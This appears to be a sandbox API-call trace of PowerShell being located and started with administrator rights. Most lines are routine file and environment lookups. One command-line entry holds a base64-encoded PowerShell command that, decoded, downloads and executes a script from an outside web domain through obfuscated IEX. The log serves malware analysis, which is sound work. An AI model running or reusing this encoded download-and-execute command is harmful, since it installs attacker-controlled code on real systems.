	[0402.088] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.088] SetErrorMode (uMode=0x1) returned 0x1
	[0402.088] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0402.089] SetErrorMode (uMode=0x1) returned 0x1
	[0402.089] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.089] SetErrorMode (uMode=0x1) returned 0x1
	[0402.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.089] SetErrorMode (uMode=0x1) returned 0x1
	[0402.090] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.090] SetErrorMode (uMode=0x1) returned 0x1
	[0402.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.090] SetErrorMode (uMode=0x1) returned 0x1
	[0402.090] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.091] SetErrorMode (uMode=0x1) returned 0x1
	[0402.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.091] SetErrorMode (uMode=0x1) returned 0x1
	[0402.091] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.091] SetErrorMode (uMode=0x1) returned 0x1
	[0402.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.092] SetErrorMode (uMode=0x1) returned 0x1
	[0402.092] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.092] SetErrorMode (uMode=0x1) returned 0x1
	[0402.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.092] SetErrorMode (uMode=0x1) returned 0x1
	[0402.092] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.093] SetErrorMode (uMode=0x1) returned 0x1
	[0402.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.438] SetErrorMode (uMode=0x1) returned 0x1
	[0402.438] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.438] SetErrorMode (uMode=0x1) returned 0x1
	[0402.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.439] SetErrorMode (uMode=0x1) returned 0x1
	[0402.439] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.439] SetErrorMode (uMode=0x1) returned 0x1
	[0402.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.439] SetErrorMode (uMode=0x1) returned 0x1
	[0402.439] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.440] SetErrorMode (uMode=0x1) returned 0x1
	[0402.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.440] SetErrorMode (uMode=0x1) returned 0x1
	[0402.440] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.440] SetErrorMode (uMode=0x1) returned 0x1
	[0402.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.440] SetErrorMode (uMode=0x1) returned 0x1
	[0402.441] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.441] SetErrorMode (uMode=0x1) returned 0x1
	[0402.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.441] SetErrorMode (uMode=0x1) returned 0x1
	[0402.441] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.442] SetErrorMode (uMode=0x1) returned 0x1
	[0402.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.442] SetErrorMode (uMode=0x1) returned 0x1
	[0402.442] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.442] SetErrorMode (uMode=0x1) returned 0x1
	[0402.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.442] SetErrorMode (uMode=0x1) returned 0x1
	[0402.443] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.443] SetErrorMode (uMode=0x1) returned 0x1
	[0402.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.443] SetErrorMode (uMode=0x1) returned 0x1
	[0402.443] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.443] SetErrorMode (uMode=0x1) returned 0x1
	[0402.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0402.444] SetErrorMode (uMode=0x1) returned 0x1
	[0402.444] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.444] SetErrorMode (uMode=0x1) returned 0x1
	[0402.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0402.444] SetErrorMode (uMode=0x1) returned 0x1
	[0402.444] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.445] SetErrorMode (uMode=0x1) returned 0x1
	[0402.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0402.445] SetErrorMode (uMode=0x1) returned 0x1
	[0402.445] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.445] SetErrorMode (uMode=0x1) returned 0x1
	[0402.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0402.446] SetErrorMode (uMode=0x1) returned 0x1
	[0402.446] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.446] SetErrorMode (uMode=0x1) returned 0x1
	[0402.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0402.446] SetErrorMode (uMode=0x1) returned 0x1
	[0402.446] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0402.446] SetErrorMode (uMode=0x1) returned 0x1
	[0402.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0402.447] SetErrorMode (uMode=0x1) returned 0x1
	[0402.447] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1247b0
	[0402.448] FindNextFileW (in: hFindFile=0x1247b0, lpFindFileData=0x1c7add50 | out: lpFindFileData=0x1c7add50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0402.448] FindClose (in: hFindFile=0x1247b0 | out: hFindFile=0x1247b0) returned 1
	[0402.448] SetErrorMode (uMode=0x1) returned 0x1
	[0402.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7ade60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0402.449] SetErrorMode (uMode=0x1) returned 0x1
	[0402.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7ae070 | out: lpFileInformation=0x1c7ae070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0402.450] SetErrorMode (uMode=0x1) returned 0x1
	[0402.451] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0402.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.451] CoTaskMemFree (pv=0x1b771250) 
	[0402.452] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0402.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.452] CoTaskMemFree (pv=0x1b771250) 
	[0402.455] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0402.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.455] CoTaskMemFree (pv=0x1b771250) 
	[0402.466] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0402.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.466] CoTaskMemFree (pv=0x1b771250) 
	[0402.479] CoTaskMemAlloc (cb=0x3b) returned 0x1b79bc30
	[0402.480] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ae258, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ae258) returned 0x4550
	[0402.480] CoTaskMemFree (pv=0x1b79bc30) 
	[0402.912] GetConsoleWindow () returned 0x102bc
	[0402.919] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0402.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.919] CoTaskMemFree (pv=0x1b771250) 
	[0402.920] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0402.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0402.921] CoTaskMemFree (pv=0x1b771250) 
	[0402.926] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0402.926] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0402.926] CoTaskMemFree (pv=0x1b771250) 
	[0402.929] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7ae2a0 | out: pNumArgs=0x1c7ae2a0) returned 0x1243b0*=""
	[0402.930] lstrlenW (lpString="-EncodedCommand") returned 15
	[0402.931] CoTaskMemAlloc (cb=0x22) returned 0x1b793970
	[0402.931] RtlMoveMemory (in: Destination=0x1b793970, Source=0x1243d2, Length=0x20 | out: Destination=0x1b793970) 
	[0402.931] CoTaskMemFree (pv=0x1b793970) 
	[0402.931] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0402.931] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7aabf0
	[0402.931] RtlMoveMemory (in: Destination=0x1b7aabf0, Source=0x1243f2, Length=0x2f2 | out: Destination=0x1b7aabf0) 
	[0402.931] CoTaskMemFree (pv=0x1b7aabf0) 
	[0402.932] LocalFree (hMem=0x1243b0) returned 0x0
	[0402.933] CoTaskMemAlloc (cb=0x804) returned 0x1b7a1860
	[0402.933] GetConsoleTitleW (in: lpConsoleTitle=0x1b7a1860, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0402.933] CoTaskMemFree (pv=0x1b7a1860) 
	[0402.942] CoTaskMemAlloc (cb=0x38e) returned 0x1243b0
